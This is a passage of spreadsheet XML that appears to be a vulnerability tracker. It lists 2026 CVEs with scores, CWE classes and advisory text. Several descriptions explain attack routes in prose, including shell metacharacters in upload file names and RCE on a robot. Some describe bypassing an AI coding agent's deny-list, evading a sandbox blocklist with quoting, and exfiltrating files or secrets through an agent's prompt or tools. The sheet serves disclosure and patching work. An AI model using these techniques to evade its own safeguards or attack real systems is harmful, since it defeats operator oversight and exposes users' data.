          <t>Shescape is a simple shell escape library for JavaScript. From 2.1.11 until 2.1.14 and 3.0.1, the flag-protection loop in compose in src/internal/compose.js repeatedly joins and slices flag fragments when flagProtection is enabled, which is the default, making processing quadratic in input size across the escape, escapeAll, quote, and quoteAll APIs. An attacker who can supply a large untrusted input containing many flag fragments can consume CPU and cause denial of service. This issue is fixed in versions 2.1.14 and 3.0.1.</t>
        </is>
      </c>
      <c r="M1225" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73413</t>
        </is>
      </c>
    </row>
    <row r="1226">
      <c r="A1226" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1226" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73614</t>
        </is>
      </c>
      <c r="C1226" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1226" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1226" s="5" t="inlineStr"/>
      <c r="F1226" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1226" s="5" t="inlineStr"/>
      <c r="H1226" s="5" t="inlineStr"/>
      <c r="I1226" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1226" s="5" t="inlineStr"/>
      <c r="K1226" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L1226" s="5" t="inlineStr">
        <is>
          <t>Network-AI ClaudeHookBridge before 5.15.1 truncates the target string to 500 characters before evaluating denyPatterns, while Claude Code executes the full untruncated command. Attackers can position dangerous content past byte 500 in a Bash command field to bypass the operator's hard-deny list and execute arbitrary commands.</t>
        </is>
      </c>
      <c r="M1226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73614</t>
        </is>
      </c>
    </row>
    <row r="1227">
      <c r="A1227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73615</t>
        </is>
      </c>
      <c r="C1227" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1227" s="5" t="inlineStr"/>
      <c r="F1227" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1227" s="5" t="inlineStr"/>
      <c r="H1227" s="5" t="inlineStr"/>
      <c r="I1227" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J1227" s="5" t="inlineStr"/>
      <c r="K1227" s="5" t="inlineStr">
        <is>
          <t>CWE-436</t>
        </is>
      </c>
      <c r="L1227" s="5" t="inlineStr">
        <is>
          <t>Network-AI versions before 5.15.1 contain a security matcher bypass vulnerability where SandboxPolicy evaluates raw command strings with quotes preserved while the executor tokenizes commands by stripping quotes before execution. Attackers can craft quoted commands that evade blocklist checks and approval gates while the executor runs the identical unquoted dangerous argv.</t>
        </is>
      </c>
      <c r="M1227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73615</t>
        </is>
      </c>
    </row>
    <row r="1228">
      <c r="A1228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73693</t>
        </is>
      </c>
      <c r="C1228" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1228" s="5" t="inlineStr"/>
      <c r="F1228" s="5" t="inlineStr"/>
      <c r="G1228" s="5" t="inlineStr"/>
      <c r="H1228" s="5" t="inlineStr"/>
      <c r="I1228" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1228" s="5" t="inlineStr"/>
      <c r="K1228" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1228" s="5" t="inlineStr">
        <is>
          <t>FileRun before 2026.3.0 contains an OS command injection vulnerability in the PhotoProofSheet handler that allows authenticated users with upload permission to execute arbitrary commands by uploading files with shell metacharacters in their names. Attackers can upload a file containing command substitution syntax such as backticks, semicolons, or $() sequences in the filename, then trigger the PhotoProofSheet endpoint to execute arbitrary commands as the web-server user due to missing escapeshellarg() sanitization in the ImageMagick montage command construction.</t>
        </is>
      </c>
      <c r="M1228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73693</t>
        </is>
      </c>
    </row>
    <row r="1229">
      <c r="A1229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74787</t>
        </is>
      </c>
      <c r="C1229" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1229" s="5" t="inlineStr"/>
      <c r="F1229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1229" s="5" t="inlineStr">
        <is>
          <t>.net</t>
        </is>
      </c>
      <c r="H1229" s="5" t="inlineStr"/>
      <c r="I1229" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1229" s="5" t="inlineStr"/>
      <c r="K1229" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1229" s="5" t="inlineStr">
        <is>
          <t>Scriban before 7.0.0 contains an uncontrolled recursion vulnerability in the object.to_json builtin function that lacks depth limits and circular reference detection. Attackers can craft templates with self-referencing objects to trigger unbounded recursion, causing a StackOverflowException that fatally terminates the hosting .NET process.</t>
        </is>
      </c>
      <c r="M1229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74787</t>
        </is>
      </c>
    </row>
    <row r="1230">
      <c r="A1230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-74792</t>
        </is>
      </c>
      <c r="C1230" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1230" s="5" t="inlineStr"/>
      <c r="F1230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1230" s="5" t="inlineStr"/>
      <c r="H1230" s="5" t="inlineStr"/>
      <c r="I1230" s="5" t="inlineStr">
        <is>
          <t>2026-08-16</t>
        </is>
      </c>
      <c r="J1230" s="5" t="inlineStr"/>
      <c r="K1230" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1230" s="5" t="inlineStr">
        <is>
          <t>Scriban before 7.0.0 (affected versions &lt;= 6.6.0) contains a stack overflow vulnerability in nested array initializer parsing. Deeply nested array initializers recurse through a path (ParseArrayInitializer → ParseExpression → ParseArrayInitializer) that is not covered by the ExpressionDepthLimit counter added in the fix for GHSA-wgh7-7m3c-fx25. An attacker who can supply untrusted input to Template.Parse can trigger an uncatchable StackOverflowException that immediately terminates the process, even with the default ExpressionDepthLimit enabled.</t>
        </is>
      </c>
      <c r="M1230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-74792</t>
        </is>
      </c>
    </row>
    <row r="1231">
      <c r="A1231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75124</t>
        </is>
      </c>
      <c r="C1231" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1231" s="5" t="inlineStr"/>
      <c r="F1231" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1231" s="5" t="inlineStr"/>
      <c r="H1231" s="5" t="inlineStr"/>
      <c r="I1231" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1231" s="5" t="inlineStr"/>
      <c r="K1231" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L1231" s="5" t="inlineStr">
        <is>
          <t>PLANET GS-4210-16P2S V3 firmware before 3.441b260626 contains a pre-authentication memory corruption vulnerability in the web management interface where the _readHttpParam function copies an oversized HTTP query string without guaranteeing NUL termination, allowing parse_query_string to process attacker-controlled data into a fixed-size stack buffer. An unauthenticated remote attacker can send an oversized GET request to dispatcher.cgi to cause denial of service of the web management interface and potentially trigger memory corruption.</t>
        </is>
      </c>
      <c r="M1231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75124</t>
        </is>
      </c>
    </row>
    <row r="1232">
      <c r="A1232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75133</t>
        </is>
      </c>
      <c r="C1232" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1232" s="5" t="inlineStr"/>
      <c r="F1232" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1232" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="H1232" s="5" t="inlineStr"/>
      <c r="I1232" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J1232" s="5" t="inlineStr"/>
      <c r="K1232" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1232" s="5" t="inlineStr">
        <is>
          <t>Keep Backup Daily plugin for WordPress before 2.1.4 contains a sensitive information exposure vulnerability that allows unauthenticated attackers to trigger a full MySQL database dump by accessing the publicly exposed `kbd_cron_process` parameter without authentication. Attackers can predict the partially predictable dump filename based on the database name, a limited random range, and the current Unix timestamp to download the generated backup from the publicly accessible uploads directory.</t>
        </is>
      </c>
      <c r="M1232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75133</t>
        </is>
      </c>
    </row>
    <row r="1233">
      <c r="A1233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75584</t>
        </is>
      </c>
      <c r="C1233" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1233" s="5" t="inlineStr"/>
      <c r="F1233" s="5" t="inlineStr"/>
      <c r="G1233" s="5" t="inlineStr"/>
      <c r="H1233" s="5" t="inlineStr"/>
      <c r="I1233" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1233" s="5" t="inlineStr"/>
      <c r="K1233" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L1233" s="5" t="inlineStr">
        <is>
          <t>ION-DTN before 4.2.1-a.1 contains a denial of service vulnerability that allows unauthenticated remote attackers to crash the ION process by sending a BPv7 bundle with a zero-length payload. The canonicalizePayloadBlock() function in bpsec_util.c passes bundle-&gt;payload.length to zco_clone() without validating it against zero, causing a failed CHKZERO assertion that triggers sm_Abort() and terminates the process with SIGABRT before any HMAC verification occurs, requiring no valid key or credential to exploit.</t>
        </is>
      </c>
      <c r="M1233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75584</t>
        </is>
      </c>
    </row>
    <row r="1234">
      <c r="A1234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75596</t>
        </is>
      </c>
      <c r="C1234" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1234" s="5" t="inlineStr"/>
      <c r="F1234" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1234" s="5" t="inlineStr">
        <is>
          <t>java, .net</t>
        </is>
      </c>
      <c r="H1234" s="5" t="inlineStr"/>
      <c r="I1234" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1234" s="5" t="inlineStr"/>
      <c r="K1234" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1234" s="5" t="inlineStr">
        <is>
          <t>Netty is an asynchronous, event-driven network application framework. Prior to 4.1.137.Final and 4.2.17.Final, the default io.netty.handler.ssl.SniHandler constructors use the pre-handshake ClientHello aggregation path in handler/src/main/java/io/netty/handler/ssl/SslClientHelloHandler.java at io.netty.handler.ssl.SslClientHelloHandler#decode, where handshakeBuffer.clear() and writeBytes() recopy all previously received body bytes for every additional TLS record. An unauthenticated remote peer can advertise a large ClientHello and deliver its body in thousands of tiny records, causing quadratic CPU work on the event loop before the TLS handshake completes and degrading TLS handling for other clients. This issue is fixed in versions 4.1.137.Final and 4.2.17.Final.</t>
        </is>
      </c>
      <c r="M1234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75596</t>
        </is>
      </c>
    </row>
    <row r="1235">
      <c r="A1235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75813</t>
        </is>
      </c>
      <c r="C1235" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1235" s="5" t="inlineStr"/>
      <c r="F1235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1235" s="5" t="inlineStr"/>
      <c r="H1235" s="5" t="inlineStr"/>
      <c r="I1235" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J1235" s="5" t="inlineStr"/>
      <c r="K1235" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1235" s="5" t="inlineStr">
        <is>
          <t>Certain configuration endpoints may lack proper server-side 
authorization checks, allowing unauthorized users to access or modify 
sensitive device settings. This could result in full compromise of 
device functionality.</t>
        </is>
      </c>
      <c r="M1235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75813</t>
        </is>
      </c>
    </row>
    <row r="1236">
      <c r="A1236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75836</t>
        </is>
      </c>
      <c r="C1236" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1236" s="5" t="inlineStr"/>
      <c r="F1236" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1236" s="5" t="inlineStr"/>
      <c r="H1236" s="5" t="inlineStr"/>
      <c r="I1236" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1236" s="5" t="inlineStr"/>
      <c r="K1236" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1236" s="5" t="inlineStr">
        <is>
          <t>The Grav API plugin (getgrav/grav-plugin-api, bundled with Grav's admin-next/API stack) before 1.0.14 fails to enforce the authorize requirement in MenubarController::executeAction(). While the GET /menubar/items listing endpoint correctly filters menubar items via userPassesAuthorize(), the POST /api/v1/menubar/actions/{plugin}/{action} endpoint only checks the baseline api.access permission and never evaluates the authorize field a plugin registered for that action. Any authenticated caller with api.access can therefore invoke a privileged menubar action directly, bypassing the intended authorization. No plugin bundled with core Grav currently registers a privileged authorize handler, so on a stock install the impact is latent; the flaw affects any first- or third-party plugin relying on the documented authorize semantics.</t>
        </is>
      </c>
      <c r="M1236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75836</t>
        </is>
      </c>
    </row>
    <row r="1237">
      <c r="A1237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75840</t>
        </is>
      </c>
      <c r="C1237" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1237" s="5" t="inlineStr"/>
      <c r="F1237" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1237" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1237" s="5" t="inlineStr"/>
      <c r="I1237" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1237" s="5" t="inlineStr"/>
      <c r="K1237" s="5" t="inlineStr">
        <is>
          <t>CWE-1025</t>
        </is>
      </c>
      <c r="L1237" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 contains an arbitrary file read vulnerability in the GraalVM JavaScript sandbox allowlist enforcement, which uses unescaped regular expressions to validate package names. Attackers with trigger creation privileges can use Java.type() to access java.util.zip.ZipFile or java.util.jar.JarFile classes and read arbitrary files on the host system as the ArcadeDB server process.</t>
        </is>
      </c>
      <c r="M1237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75840</t>
        </is>
      </c>
    </row>
    <row r="1238">
      <c r="A1238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75853</t>
        </is>
      </c>
      <c r="C1238" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1238" s="5" t="inlineStr"/>
      <c r="F1238" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1238" s="5" t="inlineStr"/>
      <c r="H1238" s="5" t="inlineStr"/>
      <c r="I1238" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1238" s="5" t="inlineStr"/>
      <c r="K1238" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1238" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB's Gremlin wire-protocol plugin (com.arcadedb:arcadedb-gremlin) in versions &lt;= 26.7.3 enforces authentication (SASL PLAIN) but performs no authorization: it never checks database access permissions (canAccessToDatabase) and never binds the authenticated principal into the engine. As a result, any valid server credential — even one provisioned for zero or one unrelated database — can read, write, and drop data in any database on the server by selecting a target database via a traversal-source alias, completely bypassing the engine's per-type/read-only/UPDATE_SCHEMA ACLs. The issue is fixed in version 26.8.1.</t>
        </is>
      </c>
      <c r="M1238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75853</t>
        </is>
      </c>
    </row>
    <row r="1239">
      <c r="A1239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75859</t>
        </is>
      </c>
      <c r="C1239" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1239" s="5" t="inlineStr"/>
      <c r="F1239" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1239" s="5" t="inlineStr"/>
      <c r="H1239" s="5" t="inlineStr"/>
      <c r="I1239" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1239" s="5" t="inlineStr"/>
      <c r="K1239" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1239" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 fail to validate file paths in the project config instructions field, allowing attackers to read arbitrary files on the victim's system. A malicious .codewhale/config.toml file in a cloned repository can specify paths outside the workspace that are read and injected into the AI system prompt for exfiltration.</t>
        </is>
      </c>
      <c r="M1239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75859</t>
        </is>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75914</t>
        </is>
      </c>
      <c r="C1240" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1240" s="5" t="inlineStr"/>
      <c r="F1240" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1240" s="5" t="inlineStr"/>
      <c r="H1240" s="5" t="inlineStr"/>
      <c r="I1240" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1240" s="5" t="inlineStr"/>
      <c r="K1240" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1240" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 contain a path traversal vulnerability in the image_analyze tool that fails to canonicalize symlinks before reading files. Attackers can create workspace symlinks pointing to external files with image extensions to leak file bytes to the vision endpoint without user approval.</t>
        </is>
      </c>
      <c r="M1240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75914</t>
        </is>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75915</t>
        </is>
      </c>
      <c r="C1241" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1241" s="5" t="inlineStr"/>
      <c r="F1241" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1241" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H1241" s="5" t="inlineStr"/>
      <c r="I1241" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J1241" s="5" t="inlineStr"/>
      <c r="K1241" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1241" s="5" t="inlineStr">
        <is>
          <t>CodeWhale versions before 0.8.64 contain an environment variable exposure vulnerability in the js_execution tool that fails to scrub parent process environment variables before spawning Node.js. Attackers can craft malicious JavaScript code executed by the tool to read process.env and leak API keys, cloud credentials, and authentication tokens back to the model context.</t>
        </is>
      </c>
      <c r="M1241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75915</t>
        </is>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75960</t>
        </is>
      </c>
      <c r="C1242" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1242" s="5" t="inlineStr"/>
      <c r="F1242" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1242" s="5" t="inlineStr"/>
      <c r="H1242" s="5" t="inlineStr"/>
      <c r="I1242" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J1242" s="5" t="inlineStr"/>
      <c r="K1242" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L1242" s="5" t="inlineStr">
        <is>
          <t>Rently Smart Home versions 20.1.0 and prior are vulnerable to an Insufficiently Protected Credentials vulnerability. This could allow an attacker to retrieve pins including the Master Pin, overriding standard user permissions.</t>
        </is>
      </c>
      <c r="M1242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75960</t>
        </is>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76224</t>
        </is>
      </c>
      <c r="C1243" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1243" s="5" t="inlineStr"/>
      <c r="F1243" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1243" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1243" s="5" t="inlineStr"/>
      <c r="I1243" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1243" s="5" t="inlineStr"/>
      <c r="K1243" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1243" s="5" t="inlineStr">
        <is>
          <t>ArcadeDB before 26.8.1 (arcadedb-gremlin, affected &lt;= 26.7.3) contains a remote code execution vulnerability in its Gremlin query engine. Although the engine defaults to the documented-secure java (gremlin-lang) engine, ArcadeGremlin.executeStatement() silently falls back to the insecure Groovy engine whenever a request carries any query parameter and the query does not parse as gremlin-lang. An authenticated user with any database role, including a read-only reader, can submit a parameterized Gremlin query to trigger the Groovy fallback and execute arbitrary operating system commands as the ArcadeDB server process user.</t>
        </is>
      </c>
      <c r="M1243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76224</t>
        </is>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76639</t>
        </is>
      </c>
      <c r="C1244" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1244" s="5" t="inlineStr"/>
      <c r="F1244" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1244" s="5" t="inlineStr"/>
      <c r="H1244" s="5" t="inlineStr"/>
      <c r="I1244" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J1244" s="5" t="inlineStr"/>
      <c r="K1244" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-306</t>
        </is>
      </c>
      <c r="L1244" s="5" t="inlineStr">
        <is>
          <t>Unitree G1 EDU firmware through 1.5.2 contains an unauthenticated remote code execution vulnerability that allows network-adjacent attackers to execute arbitrary commands as root by chaining three weaknesses: an unauthenticated WebRTC-to-DDS bridge on TCP port 9991, a static AES-128 key stored with world-readable permissions, and a path traversal flaw in the chat_go knowledge upload API. Attackers can publish DDS control messages to restart the bashrunner service, plant a malicious payload in its script execution directory via path traversal, and trigger execution of that payload as uid 0 through the bashrunner shell subprocess.</t>
        </is>
      </c>
      <c r="M1244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76639</t>
        </is>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77101</t>
        </is>
      </c>
      <c r="C1245" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1245" s="5" t="inlineStr"/>
      <c r="F1245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1245" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1245" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I1245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1245" s="5" t="inlineStr"/>
      <c r="K1245" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="L1245" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a stack-based buffer overflow issue affecting service availability. Software customers upgrade to resolved maintenance release. Update CommServe.</t>
        </is>
      </c>
      <c r="M1245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77101</t>
        </is>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77102</t>
        </is>
      </c>
      <c r="C1246" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
